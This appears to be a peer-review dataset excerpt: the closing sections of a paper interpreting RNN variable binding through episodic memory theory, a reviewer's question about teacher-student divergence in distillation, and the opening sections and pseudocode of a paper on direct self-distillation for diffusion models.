to the update equations of an Elman RNN under the homeomorphic transformation $V_f = h$ if the norm of the matrix is bounded by 1. That is, if $||\Xi \Phi^\top \Xi^\dagger|| \leq 1$, we can consider a new state variable $h = \sigma_f(V_f)$ such that $$h(t) = \sigma_f(\Xi \Phi^\top \Xi^\dagger h(t-1)).$$ This conjugate system has equations that are equivalent to an Elman RNN hidden state update equation without bias $h(t+1) = \sigma_f(W_{hh} h(t))$. Corollary 3.0.1 The learned synaptic interactions of autonomously evolving Elman RNNs without bias can be decomposed in terms of memory models ($W_{hh} = \Xi \Phi \Xi^\top$) and interpreted as the retrieval of memories temporally transitioning according to the rules encoded in the intermemory interactions. This corollary also generalizes to the case of forward-only networks as they can be viewed as a single-step update of the RNN update equations. We now formulate the Episodic Memory Theory as follows: The Episodic Memory Theory (EMT) poses that the inner workings of learned neural networks can be revealed by analyzing the learned inter-memory interactions and its effect in the space of stored memories (Figure 1). 4 VARIABLE BINDING TASKS Definition of Variable Binding: Variable binding in the context of RNNs refers to the network’s ability to store and process pieces of input information symbolically across different timesteps, utilizing this information to generate the necessary outputs. For example, in a language translation task, variable binding involves storing the source sentence provided to the RNN as input in the hidden state which will be referred to when generating the translated language. Directly analyzing the variable binding behavior of RNNs in complex tasks like language translation is very challenging because it is not clear what the variables will be. We thus take Algorithm 1 Algorithm for approximating variable memories of trained linear RNNs \[ 0 \leq \alpha \leq 1 \\ s \\ W_{hh}, W_r \\ \Psi_s \leftarrow W_r^\dagger \\ \text{for } k \in \{s-1, s-2, \ldots, 1\} \text{ do} \\ \quad \Psi_k \leftarrow \left(W_{hh}^\top\right)^k W_r^\dagger \\ \quad \Psi_k \leftarrow \Psi_k - EE^\dagger \Psi_k \quad \forall E : \lambda(E) < 1 \quad \triangleright \text{Remove the components along transient directions.} \\ \text{end for} \\ \Psi \leftarrow [\Psi_1; \ldots; \Psi_s] \\ \Psi^\perp \leftarrow \text{PC}(\{h(t)\} - \Psi \Psi^\dagger \{h(t)\}) \quad \triangleright \text{Principle Components of } h \text{ from simulations} \] the approach of developing a class of toy variable binding tasks where the variables that need to be stored are well-understood. This approach is used in the mechanistic interpretation of forward-only neural networks (Chughtai et al., 2023; Li et al., 2015b), and RNNs (Maheswaranathan et al., 2019; Graves et al., 2014; Sussillo & Barak, 2013). The variable binding tasks we consider are the generalization of the RepeatCopy task used to evaluate memory storage capabilities of recurrent neural architectures used by Keller et al. (2023) and Graves et al. (2014). Our approach to interpreting the trained RNNs also generalizes the dynamical systems approach of (Sussillo & Barak, 2013) to high dimensional task spaces found in the variable binding tasks (See Appendix Figure 5 for the diversity and high dimensional nature of the eigenvalue distribution found in the learned representation of the variable binding tasks). By taking the step to generalize existing simple setups, the variable binding tasks provide a path forward to close the gap between simple tasks and real-world scenarios, without sacrificing on human-interpretability. Variable Binding Tasks: We define variable binding tasks as consisting of two phases: the input phase and the output phase. The input phase lasts for \( s \) timesteps. During each timestep \( t \) (where \( 1 \leq t \leq s \)) of this phase, the RNN receives a \( d \)-dimensional input vector \( u(t) = [u^1(t), u^2(t), \ldots, u^d(t)]^\top \). These vectors \( u(t) \) provide the external information that the RNN is expected to store within its hidden state. It is important to note that the information necessary to compute the output at each timestep is cumulatively stored for use in subsequent steps. Once the input phase concludes at timestep \( s \), the output phase begins immediately from timestep \( s + 1 \). During the output phase, the RNN no longer receives external input and instead operates autonomously, generating outputs based on the information stored during the input phase. The RNN should output the composition function \[ y(t) = f(y(t-1), y(t-2), \ldots, y(t-s)), \text{ for } t > s \] \( y(t) \) is initialized as \( y(t) = u(t) \) for \( 0 < t \leq s \). This task setup implies that the RNN needs to use the accumulated information from the input phase to influence its outputs in the subsequent phase. For the purpose of our analysis in the paper, we define two constraints on the variable binding tasks: (1) the composition function \( f \), which governs the output generation, is linear, and (2) the domain of \( f \) (the set of possible input values), and the codomain of \( f \) (the set of possible output values) are binary, consisting of values in \( \{-1, 1\} \). These simplifications enable us to focus on how the RNN processes and integrate the input information across different timesteps to produce coherent outputs, abstracting out what the variables are actually storing. 5 VARIABLE BINDING CIRCUIT IN RNN In this section, we develop a circuit to explain the mechanisms in RNNs that enable them to learn and generalize in the variable binding tasks. The circuit simplifies understanding the complex dynamics of these networks in a more analytically tractable, and human interpretable form. Our approach starts by considering RNNs in their linearized form, defined by specific linear equations involving the hidden state, input, and output. This simplification lays the foundation for further analysis. We propose changing the basis of the RNN’s representation (both the hidden state and the learned synaptic interactions), to treat the linearized RNN as transitioning according to the sequential mem- Table 1: RNNs consistently converge to the variable binding circuit: The top image shows the composition functions for the 4 tasks, visualized as a matrix with x-axis input, and y-axis output. Red color denotes +1, blue is -1 and no color is 0. \( T_1 \) is the function for a simple repeat copy task, the rest are other general composition functions. The table shows the MAE in the complex argument between the eigenspectrum of the predicted \( \Phi \) from the variable binding circuit and the empirically learned \( W_{hh} \) in 4 tasks across 20 seeds under different RNN configurations. This average error is indeterminate (—) if the rank of the theoretical \( \Phi \) is different from the empirical \( W_{hh} \). Values in the brackets show the average test accuracy of the trained model. For models that have high test accuracy (> 0.94), the error in the theoretically predicted spectrum is very low indicating consistent convergence to the theoretical circuit. A notable exception of this behavior is \( T_1 \) with hidden size=64 and \( L_2 = 0 \), where the restricted availability of dimensions forces the network to encode variables in bottleneck superposition resulting in a low-rank representation of the solution. Linear RNN: We build our model of variable binding on a linearized RNN defined by the following equations. \[ \begin{align*} h(t) &= W_{hh}h(t-1) + W_{uh}u(t), \\ y(t) &= W_r h(t). \end{align*} \] We envision that any non-linear RNN can be converted to this form by finding fixed points and subsequent linearization (See Appendix A.5 for details). Here, \( W_{hh}, W_{uh}, W_r \) are linear operators that gets learned after training on the variable binding tasks. We will use the concept of variable memories to form principled hypotheses for these operators that will be validated by experimental results. \( h(t) \) is the hidden state, \( u(t) \) is the input, and \( y(t) \) is the output. We use a simplifying assumption that \( W_{hh} \) has sufficient capacity to represent all the variables required for the variable binding tasks. We further assume that \( h(0) \) is the zero vector. Variable Memory: We decompose the linear RNN using the GSEMM equivalence (Corollary 3.0.1) and define variable memories as subspaces of the space spanned by: \( \psi_\mu = \sum_i \xi_i^\mu e_i \). In the new basis, the hidden state vector is \( h(t) = \sum_\mu h^\psi_\mu \psi_\mu \). The subspace spanned by the collection of vectors \( \{\Psi_k\} = \{\psi_\mu : \mu \in \{(k-1)d, \ldots, kd\}\} \) is called the \( k^{th} \) variable memory. The activity of the subspace is the contents of the \( k^{th} \) variable. Variable Memory Interactions (hypothesis): The variable binding tasks require mechanisms in \( \Phi \) capable of retaining variables of the variable binding tasks for \( s \) timesteps. One possibility for this Figure 3: **EMT reveals latent neurons storing task relevant information over time**: A. In the repeat copy task ($T_1$), the RNN needs to repeatedly produce an input sequence that is presented. A typical trained hidden state after providing the input does not show any meaningful patterns connected to the input. B. The same hidden states when visualized in the variable memories reveal the input information being stored as variables and processed according to the variable binding circuit. The actual hidden state is in a superposition of these latent variable memory activities. is the following linear operator $\Phi$, defined in terms of the variable memories. $$\Phi = \sum_{\mu=1}^{(s-1)d} \psi_\mu \psi_{\mu+d} + \sum_{\mu=(s-1)d+1}^{sd} \sum_{\nu=1}^{sd} \Phi^\mu_\nu \psi_\mu \psi_\nu.$$ The action of the operator on the hidden state is illustrated in Figure 2A. For all variable memories with index $i \in \{2, 3, 4, \ldots, s\}$, the variable contents (subspace activities) gets copied to the variable memory with index $i - 1$. The operator then applies the function $f$ defined in Equation 2 on the variable contents and stores the result in the $s^{th}$ subspace. This circuit generalizes to any instantiation of the variable binding tasks with a linear composition function $f$. **Reading from Variable Memories (hypothesis):** Once RNN has performed its computation in the space of variable memories, the computed information needs to be extracted from the hidden state. The linear RNN has an operator $W_r$, which facilitates the reading of information from $h(t)$ at consecutive time steps. We propose that $W_r$ has the following equation which projects the activity of the $s^{th}$ subspace to the standard basis (Figure 2B) for output. $$W_r = \sum_{\mu=(s-1)d+1}^{sd} e_{\mu-(s-1)d} \psi^\mu$$ ### 5.1 Result: RNNs Consistently Converge to the Variable Binding Circuit To substantiate that the current hypothetical circuit is learned by empirical RNNs when trained on the variable binding tasks, we trained various RNN configurations, differing in hidden sizes and regularization penalties on 4 variable binding tasks each differing in the linear composition function $f$ (See top of Table 1). After training, the RNNs were linearized, and the eigen-spectrum of the learned $W_{hh}$ matrix is compared with the theoretical $\Phi$, as defined in Equation 4. If RNNs learn a representation in alignment with our model, both operators, i.e., the learned $W_{hh}$ and theoretical $\Phi$, are expected to share a portion of their eigenspectrums as they are similar matrices (i.e they differ only by a basis change). We compared only the complex arguments of the spectrum, disregarding the magnitude. The rationale behind this exclusion lies in what the magnitude tells about the dynamical behavior. The eigenvalue magnitude portrays whether a linear dynamical system is diverging, converging, or maintaining consistency along the eigenvector directions (Strogatz 1994). RNNs typically incorporate a squashing non-linearity, such as the Tanh activation function, which restricts Figure 4: **EMT enables human interpretability of learned RNN parameters**: The learned weights when visualized in the variable memories result in a form that is human-interpretable. For RNNs trained on two sample tasks $T_1$ (A left) and $T_2$ (B right), the weight matrix $W_{hh}$ converts into a form that reveals internal mechanisms of how RNNs solve the task. For both tasks, the variables with index < 8 copies its contents to the preceding variable. Variable 8 actively computes the function $f$ applied on all the variables stored in the hidden state using the variable binding circuit. For $T_1$, it is a simple copy of the 1st variable, and for $T_2$, it is a linear composition of all the variables. Notably, the circuit for $T_2$ shows an optimized basis where all the irrelevant dimensions are absent. trajectories that diverge to infinity. Essentially, provided the eigenvalue magnitude remains $\geq 1$, the complex argument solely determines the overall dynamical behavior of the RNN. Table 1 depicts the average absolute error in the eigenspectrum and test accuracy when the RNN models are trained across 4 distinct variable binding tasks. The table shows that RNNs consistently converge to the hypothetical circuit. 6 **Practical Considerations of EMT** Now we have sufficient evidence to show that the learned parameters of RNNs converge to our hypothetical circuit of Equation 4. We can now develop a procedure to explore empirical RNNs in terms of the variable memories. The RNN can then be interpreted using the variable binding circuit to deconstruct where the variable memories are stored and how they interact to produce the necessary outputs. Viewing the operations of the learned RNN interaction matrix $W_{hh}$ in the basis of variable memories has an additional benefit – it provides a path to influence or “fix” RNN behavior after the training. This “fixing” operation can be imagined as changing the learned parameter $W_{hh}$ by influencing specific weights of the extracted $\Phi$. This can potentially be utilized to improve variable storage characteristics, fix problems computing the composition $f$ or even remove computations that are deemed unnecessary. Building on the intuition from the linear model, we use the learned RNN weights $W_{hh}$, and $W_r$ to estimate the basis vectors of the variable memories. From our hypothesis on reading from variable memories (Equation 5), $\Psi_s = W_r^\dagger$ ($\dagger$ is the Moore-Penrose pseudoinverse) defines a matrix whose columns are the basis vectors of the $s^{th}$ variable memory. Similarly, other basis vectors can be found as columns of the matrices obtained by propagating these dimensions forward in time: $\Psi_k = \Phi^{s-k}\Psi_s = W_{hh}^{s-k}W_r^\dagger$. Although the variable memories are defined based on a linear evolution assumption, we found that the method of power iterating $W_{hh}$ was effective in defining the variable memories for even the non-linear Elman RNNs. For completeness, we characterize RNN behavior not currently explainable by the variable binding circuit using a space orthogonal to the variable memories ($\Psi^\perp$). The pseudo-code for the algorithm to approximate variable memories from a linearized RNN is summarized in Algorithm 1. A formal analysis of the correctness of the approximation is in the Appendix A.6. 6.1 Result: Variable Memory Reveals Variable Binding Latent Neurons We approximated the variable memories of RNNs trained on the Repeat Copy task ($T_1$) using the algorithm and visualized the hidden state. In the Repeat Copy task, the RNN must repeatedly output the stream of inputs provided during the input phase. The simulated hidden states of learned RNNs are visualized by projecting the hidden state in the variable memories: $\hat{h} = \Psi \Psi^\dagger h$. The results shown in Figure 3 reveal that the hidden state is in a superposition (or distributed representation) of latent neurons that actively store each variable required to compute the function $f$ at all points in time. The basis transformation helps to disentangle these superposed (or distributed) variables from the hidden state so that they are easily visualized. 6.2 Result: Variable Memories Enable Human Interpretability of Learned Weights In addition to revealing hidden neurons that store and process information over time, variable memories can also be used as bases to view the function of the learned matrices. The variable memories are carefully constructed such that $W_{hh}$ converts to the underlying $\Phi$ when viewed in the basis and any behavior not explainable by $\Phi$ is shown as interactions with the orthogonal space. The Figure 4 shows the learned parameters of $W_{hh}$ encoding the variable binding circuit. The low connectivity (near zero magnitude in the interactions) between the variable memories and the orthogonal space indicates that the variable binding circuit fully explains the behavior of the RNNs. 7 Discussion In this work, we frame Recurrent Neural Networks as discrete-time analogs of the General Sequential Episodic Memory Model – an energy-based memory model from computational neuroscience. We introduced the concept of “variable memories,” linear subspaces capable of symbolically binding and recursively composing information, providing a path forward to lift the fixed memory assumption of the memory model, and promoting applicability in mechanistic understanding. The variable memory approach addresses some of the limitations of current methods in understanding RNNs, particularly the intractability of Jacobian spectral analysis in high-dimensional task spaces. We presented a new class of algorithmic tasks that are designed to probe the variable binding behavior by generalizing existing simple tasks, taking a step to close the gap between toy tasks and real-world tasks without compromising on human interpretability. We presented a circuit mechanism that is capable of recursively storing and composing variables and showed empirical evidence that trained RNNs consistently converge to this circuit indicating computational universality in the learned representation and behavior of models. Building on the evidence, we used variable memories to define a privileged basis from trained RNN parameters that revealed latent neurons actively involved in information processing. Further, using variable memories, we viewed the learned parameters of an RNN in a human-interpretable manner, enabling reasoning and understanding RNN behavior as repeatedly shifting and composing variables. Using the tools from the theory, we fully deconstructed both the hidden state behavior and the learned parameters of empirically trained RNNs. Limitations: With these results, it is also important to recognize inherent limitations to the variable memory approach. One of the limitations is that the analysis we presented is primarily restricted to linear dynamical systems. Although an accurate representation of the qualitative behavior within small neighborhoods of fixed points can be found for non-linear dynamical systems, the RNNs have to be confined to these linear regions for the approach to be applicable. It is still an interesting behavior that models consistently converge to this linearized regime, at least for the tasks outlined in Section 4. Outside the linear regions, RNNs may also exhibit behaviors like ergodicity and chaos which the current analysis cannot support. The second limitation of the approach is that external information is stored as a linear superposition of variable memories in the hidden state. Our results indicates that the role of non-linearity in encoding external information may be minimal for the toy tasks. However, we have observed that when the number of dimensions of the linear operator $W_{hh}$ is not substantially large compared to the task’s dimensionality requirements (bottleneck superposition) or when the regularization penalty is high, the RNN can effectively resort to non-linear encoding mechanisms to store external information (Appendix B.3). Overcoming these limitations of non-linearity will be an interesting direction to pursue in future research, and will bring the con- cept of variable memories closer to addressing the challenges posed by the quest to understand neural computation. 8 Reproducibility Statement We have taken steps to ensure the reproducibility of the theoretical and empirical contributions of the paper. The main contributions of the paper include: (1) The theoretical connection between RNNs and sequence memory models, (2) creation of toy models to test variable binding in RNNs, (3) a mathematical model of variable binding, and (4) algorithm to compute variable memories for RNN interpretability. For (1), we summarize the high level ideas of the proof in the main document in Section 3 and provide detailed steps in Appendix A.2. For (2), we provided a mathematical description in Section 4 where the final paragraph details the assumptions we consider in the paper. For (3), we detail the mathematical model in Section 5; the assumptions of linearity and sufficient rank is stated in the section. Further, we have provided two fully worked examples in Appendix A.4. For the theoretical component of (4), we have stated the algorithm in Algorithm 1, and explained how the algorithm was formulated in Section 6. For the empirical component of (4), we have detailed the empirical procedure for creating data in Appendix B.1 and training the models in Appendix B.2. We also provided jupyter notebooks and custom python libraries that were used to create the plots and tables in the supplementary materials. References A. Alishahi, Grzegorz Chrupala, and Tal Linzen. Analyzing and interpreting neural networks for nlp: A report on the first blackboxnlp workshop. Natural Language Engineering, 25:543 – 557, 2019. URL https://api.semanticscholar.org/CorpusID:102350595 Nick Bostrom. Superintelligence: Paths, dangers, strategies. 2014. URL https://api.semanticscholar.org/CorpusID:106762840 Vanessa Buhrmester, David Münch, and Michael Arens. Analysis of explainers of black box deep neural networks for computer vision: A survey. ArXiv, abs/1911.12116, 2019. URL https://api.semanticscholar.org/CorpusID:208309956 Nick Cammarata, Shan Carter, Gabriel Goh, Chris Olah, Michael Petrov, Ludwig Schubert, Chelsea Voss, Ben Egan, and Swee Kiat Lim. Thread: Circuits. Distill, 2020. doi: 10.23915/distill.00024. https://distill.pub/2020/circuits. Hamza Tahir Chaudhry, Jacob A. Zavatone-Veth, Dmitry Krotov, and Cengiz Pehlevan. Long sequence hopfield memory. ArXiv, abs/2306.04532, 2023. URL https://api.semanticscholar.org/CorpusID:259095470 Z. Che, S. Purushotham, K. Cho, D. Sontag, and Y. Liu. Recurrent neural networks for multivariate time series with missing values. Scientific Reports, 8, 2018. doi: 10.1038/s41598-018-24271-9. Brian Cheung, Alex Terekhov, Yubei Chen, Pulkit Agrawal, and Bruno A. Olshausen. Superposition of many models into one. ArXiv, abs/1902.05522, 2019. URL https://api.semanticscholar.org/CorpusID:61153603 Brian R. Christian. The alignment problem: Machine learning and human values. Perspectives on Science and Christian Faith, 2021. URL https://api.semanticscholar.org/CorpusID:253505740 Bilal Chughtai, Lawrence Chan, and Neel Nanda. A toy model of universality: Reverse engineering how networks learn group operations. In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), Proceedings of the 40th International Conference on Machine Learning, volume 202 of Proceedings of Machine Learning Research, pp. 6243–6267. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/chughtai23a.html
QKqWnNkwPL
I am not sure that this statement in introduction (second paragraph) about the current distillation techniques is true — “The student is trained to mimic the teacher, but in fewer iterations, so that, eventually the teacher and the student diverge during training.” In my experience with distillation techniques, I haven’t seen that student and teacher diverge in the cases when distillation is successful. Could the authors elaborate on what they mean by “diverge” here?
SELF-DISTILLATION FOR DIFFUSION Anonymous authors Paper under double-blind review ABSTRACT In recent years, diffusion models have demonstrated powerful generative capabilities. As they continue to grow in both ability and complexity, performance optimization becomes more relevant. Knowledge Distillation (KD), where the output from a pre-trained teacher model is used to train a smaller student model, has been shown to greatly reduce the number of network evaluations required, while retaining comparable image sample quality. KD is especially useful in diffusion, because it can be used not only to distill a large model into a small one, but also to distill a large number of denoising iterations into a small one. Here, we show that a form of self-distillation—training a subnetwork to mimic the output of the larger network, effectively distilling a network into itself—can improve distillation in diffusion models. We show first that when a pre-trained teacher model is distilled to a student network, we can turn this into a self-distillation procedure by unifying the teacher and the student. Our results indicate that this leads to faster convergence for a competitive sample quality. Additionally, we show in small-scale experiments that when diffusion models are trained from scratch, adding a self-distillation term to the loss can, in specific cases, help the model to converge, producing high-quality samples more quickly. 1 INTRODUCTION A major drawback of image-generating diffusion models (Sohl-Dickstein et al., 2015; Song & Ermon) is the gradual denoising process, at times requiring up to 1000 denoising steps in order to produce results which are visually pleasing and/or acceptable interpretations of the desired final outcome (Sohl-Dickstein et al., 2015; Ho et al., 2020). Optimizations, such as training on latent image representations and using implicit scheduling, known as denoising diffusion implicit models (DDIM), have reduced the number of steps needed to generate decent samples to the range of 20-50 (Song et al., 2021). Despite these advances, diffusion models still require substantially more computational resources at inference time than Generative Adversarial Networks (GANs), whose execution is comparable in complexity to a single iteration of a diffusion model (Sohl-Dickstein et al., 2015; Ho et al., 2020). Recently, knowledge Distillation (KD) techniques have proven effective in further reducing the required DDIM steps, in some cases even achieving good results in a single forward pass (Salimans & Ho, 2022; Meng et al., 2023; Luhman & Luhman, 2021). Current distillation techniques for diffusion models involve a form of teacher/student distillation, where an original pre-trained model is frozen, to be used as a teacher, and is copied, with the copy to be used as a student model. The student is trained to mimic the teacher, but in fewer iterations, so that in time the student converges to replicate the teacher’s sample quality at fewer sampling steps. Either the student’s single DDIM step is directly compared against the teacher’s final output (Luhman & Luhman, 2021), which involves a slow training process requiring many evaluations per parameter update, or the student’s single-step output is compared against two steps of the teacher model, progressively reducing the total DDIM steps in halves (Salimans & Ho, 2022). This results in three steps being taken per update of the student’s weights (Salimans & Ho, 2022; Meng et al., 2023). For both these existing methods, the teacher model’s parameters remain static during each iteration, providing the same quality of information for the student to absorb (Song et al., 2021). A different approach to distillation is self-distillation (Zhang et al., 2022; 2019), where during training, a model (like a CNN or a single-stack LLM) is given two outputs: one from all layers in the model, and one from only the first $k$ layers. Then as the model trains on a standard loss, an additional loss term is added to induce the second output to mimic the first. The idea is that whatever the whole network has learned is distilled into the lower layers, freeing up the higher layers. In this setting there is no need for a two-phase training: as soon as the network as a whole learns something, it is immediately distilled into the subnetwork. We propose to apply self-distillation to diffusion models, resulting in what we term direct self-distillation (DSD). In DSD, we do not separate the teacher and student models and instead, in the spirit of self-distillation, distill a model into itself during training. Specifically, we train sequentially, taking a full DDIM sample from the model. For every two steps of sampling, receiving intermediate samples $z_{t-1}, z_{t-2}$, we then take the current prediction for the fully denoised final sampling step $x_0(z_{t-1})$, with the subsequent step’s predicted $x_0(z_{t-2})$ as a target, and minimize the squared distance between them (computing gradients only over the prediction). Compared to existing methods, there are three key differences. First, we distill the model into itself, instead of keeping the teacher and student separate. Second, we do not use training data, instead relying only on the samples from the model itself. This simplifies training, removing data loading from the process entirely. Finally, we train sequentially: we perform distillation steps for every other iteration of a full sample. This contrasts with previous methods where a random point along the sampling trajectory was chosen for each distillation step. The result is a diffusion model that directly generates high-quality output in a low number of steps. We show that a large diffusion model (specifically, a pretrained conditional ImageNet 256x256 model with ~400M parameters as well as pretrained LSUN Bedroom and CelebA unconditional models with ~274M parameters each, at 128x128 and 256x256 resolutions respectively) can be distilled down to two iterations, using DSD. Similarly, we follow the experiments from Yang et al., and show that if the teacher/student distillation used there is replaced by DSD, competitive results may be achieved with as much as an order of magnitude fewer parameter updates. Then, to test whether, in principle at least, self-distillation may be applied when training a model from scratch, we introduce a version of DSD for this purpose, and show that it performs well on small scale image generation tasks. Taken together with our other results, this suggests that when training image diffusion models at scale, self-distillation may help reduce the number of iterations required as part of training, with no need for a two-stage process. 2 RELATED WORK Diffusion models were introduced in Sohl-Dickstein et al. (2015) and shown to perform at scale in Ho et al. (2020). Despite advances like DDIMs Song et al. (2021) to reduce the number of iterations required, the sampling time still remains one of the main bottlenecks. Knowledge distillation (Buciluă et al., 2006; Hinton et al., 2015; Gou et al., 2021) is a promising approach to reduce the required iterations to (close to) 1. This was first done by Luhman & Luhman distilling directly into a single network using a fully denoised image as targets. Salimans & Ho (2022) introduced Progressive distillation, showing that gradually reducing the number of steps taken by both the teacher and the student leads to better results whilst introducing intermediate denoised images as targets, improving efficiency. Meng et al. (2023) extended this approach to conditional diffusion models. One application of knowledge distillation is that large networks may be distilled into smaller networks with relatively little loss of performance (Sanh et al.). This leads naturally to the idea of self-distillation (Zhang et al., 2021), where the output of a large network is distilled into a subnetwork during training. This often improves performance at very little extra computational cost. Self-distillation has successfully been applied in contexts such as graph learning (Li et al., 2021), object detection (Zheng et al., 2020) and regularizing classification (Yun et al., 2020). --- 1 The phrase self-distillation is also used to refer to teacher/student distillation with identical architectures. Here, it only refers to the method described, where the student is in some sense a sub-network of the teacher. 2 Resource limitations preclude us from testing this approach on the scale of state-of-the-art models. A related, but distinct approach is to use a trained model to generate several outputs, and to combine these into a superior training label on which the whole model is then refined. This may be referred to as self-training in large language models Huang et al. (2022) and a policy-improvement operator in reinforcement learning Sutton & Barto (2018); Silver et al. (2017). 3 PROGRESSIVE DISTILLATION (PD) Progressive Distillation (PD) aims to retain sampling quality whilst progressively halving DDIM steps taken. This method iteratively refines a diffusion model by reducing the number of sampling steps, utilizing a teacher-student dynamic. The process commences with a standard-trained teacher diffusion model, which then imparts its characteristics to a student model. In each iteration of PD, the student model is initialized as a clone of the teacher model, inheriting both parameters and model definition. The training involves sampling from a data-set, adding noise to it to form noisy sample $z_t$, and then applying the student model to this data. Unlike conventional training, the PD approach modifies the target for the denoising task. Instead of the original data $x$, the student model denoises towards a newly defined target $\tilde{x}$, calculated as: $$\tilde{x}(z_t) = 2 \text{ DDIM steps with teacher model from } z_t \text{ to } z_{t-1}/N$$ where $N$ is the number of student sampling steps. This process sees three DDIM steps per student model parameter update. The refined teacher target, specific to PD, allows the student model to make more precise predictions, enhancing sampling efficiency. After training a student model with $N$ steps, the process is repeated with $N/2$ steps, where the student then serves as the new teacher. This iterative cycle, detailed in Algorithm 1, continues until a desired efficiency is achieved, significantly reducing sampling time while maintaining output quality. 4 DIRECT SELF-DISTILLATION We will refer the general family of approaches that take a pre-trained model (the teacher) along with an image data-set, and distill it into a separate, new model (the student) as progressive distillation (PD) techniques. By contrast, we aim to distill a single model into itself, removing the need of a static teacher model or image data-set. That means that the distillation step at any point in --- When we apply this to distillation, we take two iterations of the UNet model, and distill the result back into the first. Therefore we don’t quite distill into a smaller sub-network, but essentially do distill the output of a larger computation graph into a smaller sub-graph. training attempts to teach the pre-trained model to do in $N$ steps what it itself currently does in $2N$ steps. Variants of this approach will be labeled as forms of direct self-distillation (DSD). 4.1 Fine-tuning DSD Let $x_0 \sim D$ represent a sample from the dataset. Diffusion works by generating a sequence of $T$ latent variables $z_1, \ldots, z_T$, by progressively adding noise to the data, so that $z_T \sim N(0, I)$. A UNet model $\hat{x}_\theta$ is then trained to reverse this process. In most diffusion models $\hat{x}_\theta(z_t)$ predicts the noise vector $\epsilon_t$ for which $z_t = x_0 + \epsilon_t$. From this, we can predict both $x_0$ and $z_{t-1}$. Sampling is then performed by starting with a sample $z_T \sim N(0, I)$ and progressively denoising it. In direct self distillation, we are given a pre-trained model $\hat{x}_\theta$. We perform a full DDIM sample of $N$ iterations. Note that when we sample from $\hat{x}_\theta$, $t$ indexes backwards from $N$ to $0$. We compute two steps of DDIM for every step of self-distillation. Starting at $z_t$, this produces $z_{t-1}$ and $z_{t-2}$. We then update according to the loss function $w(\lambda_t) \cdot \|x_{t-1} - x_{t-2}\|^2$ where $w(\lambda_t)$ represents a weighting function. We back-propagate only over the computation of $z_{t-1}$, detaching the computation of $z_{t-2}$. This ensures that in the above loss, $x_{t-1}$ functions as a prediction, and $x_{t-2}$ functions as a target, with the network learning to adapt the former to the latter. See Figure 1 for a diagrammatic comparison between DSD and PD. As a weighting $w(\lambda_t)$, we use the Truncated Signal to Noise Ratio (SNR), which allows for the distillation to put more emphasis on updating model parameters given higher SNR values aiming to improve image sharpness. $w$ in turn truncates weighting during early DDIM steps with low SNR, which becomes increasingly important when DSD progresses towards fewer DDIM steps with higher noise values. Below we outline the DSD algorithm, together with the progressive distillation (PD) algorithm for comparison. Note that in DSD $\theta$ represents the parameters of the given model which is fine-tuned directly. 4.1.1 Scheduling $N$ In PD, the student is trained until convergence, after which the number of sampling steps $N$ is halved and the old student becomes the new teacher. In DSD, we do not require that training converges. Instead, we define three different schedules for how $N$ should decrease during training, and how many samples we take for each $N$. Experimentally, we find a good approach is to keep the total parameter updates seen for each depth $N_i$ approximately constant. If, for instance, we decay $N_i$ linearly, but keep the number of samples for each $N_i$ the same, more parameter updates are performed for the higher $N_i$, since we update once for every two sampling steps. Instead, we adjust the number of samples taken, referred to as $U_i$, to keep the number of parameter updates for each $N_i$ roughly equal. Naive DSD (DSDN) In DSDN, $N_i$ and $U_i$ remain constant throughout distillation. This approach does not ultimately reduce the number of denoising steps required for generation. Note however, that we still distill later denoising steps into earlier ones, so we can still expect to see high-quality output after fewer steps than in the original model, if training is successful. --- 4 The model also receives $t$ as a parameter, but this is omitted to simplify the notation. 5 If convergence-based scheduling is preferred, intermittent FID/IS score calculation can provide such metrics in the absence of a converging loss function. 6 Since we do not require a new model to be copied when we change $N$, we are more flexible in reducing $N$ gradually. Algorithm 1 PD (from Salimans & Ho [2022]) Require: Trained teacher model $\hat{x}_\eta(z_t)$ Require: Data set $D$ Require: Loss weight function $w()$ Require: Sampling steps $N$ for $K$ iterations do $\theta \leftarrow \eta$ ▷ Init student from teacher while not converged do $x \sim D$ $t = i/N$, $i \sim Cat[1, 2, \ldots, N]$ $\epsilon \sim N(0, I)$ $z_t = \alpha_t x + \sigma_t \epsilon$ # 2 steps of DDIM $t' = t - 0.5/N$, $t'' = t - 1/N$ $z_{t'} = \alpha_t \hat{x}_\eta(z_t) + \frac{\sigma_t}{\sigma_{t'}}(z_t - \alpha_t \hat{x}_\eta(z_t))$ $z_{t''} = \alpha_{t''} \hat{x}_\eta(z_{t'}) + \frac{\sigma_{t''}}{\sigma_{t'}}(z_{t'} - \alpha_{t'} \hat{x}_\eta(z_{t'}))$ $\tilde{x} = \frac{z_{t''} - (\sigma_{t''}/\sigma_{t'})z_{t'}}{\alpha_{t''} - (\sigma_{t''}/\sigma_{t'})\alpha_t}$ ▷ Teacher $\tilde{x}$ target $\lambda_t = \log[\alpha_t^2/\sigma_t^2]$ $L_\theta = w(\lambda_t)\|\tilde{x} - \hat{x}_\theta(z_t)\|^2$ $\theta \leftarrow \theta - \gamma \nabla_\theta L_\theta$ end while $\eta \leftarrow \theta$ ▷ Student becomes next teacher $N \leftarrow N/2$ ▷ Halve # of sampling steps end for Algorithm 2 Fine-tuning DSD Require: A trained model $\hat{x}_\theta(z_t)$ Require: Loss weight function $w()$ Require: Schedule of # of updates $U$, and steps $N$ for $U_i$ updates do for $t \in N_i, N_i - 2, N_i - 4, \ldots, 2$ do $z_t = N(0, I)$ if $t = N$ else $z_{t''}$ # 2 steps of DDIM $t' = t - 1$, $t'' = t - 2$ $z_{t'} = \alpha_t \hat{x}_\theta(z_t) + \frac{\sigma_t}{\sigma_{t'}}(z_t - \alpha_t \hat{x}_\theta(z_t))$ $z_{t''} = \alpha_{t''} \hat{x}_\theta(z_{t'}) + \frac{\sigma_{t''}}{\sigma_{t'}}(z_{t'} - \alpha_{t'} \hat{x}_\theta(z_{t'}))$ $x' = \frac{z_{t''} - (\sigma_{t''}/\sigma_{t'})z_{t'}}{\alpha_{t''} - (\sigma_{t''}/\sigma_{t'})\alpha_t}$ ▷ predicted $\hat{x}$ $x'' = \frac{z_{t''} - (\sigma_{t''}/\sigma_{t'})z_{t'}}{\alpha_{t''} - (\sigma_{t''}/\sigma_{t'})\alpha_t}$ ▷ target $\hat{x}$, detached $\lambda_t = \log[\alpha_t^2/(1 - \alpha_t^2)]$ $L_\theta = w(\lambda_t)\|x' - x''\|^2$ $\theta \leftarrow \theta - \gamma \nabla_\theta L_\theta$ end for end for Iterative DSD (DSDI) In DSDI, we implement a similar scheduling approach to 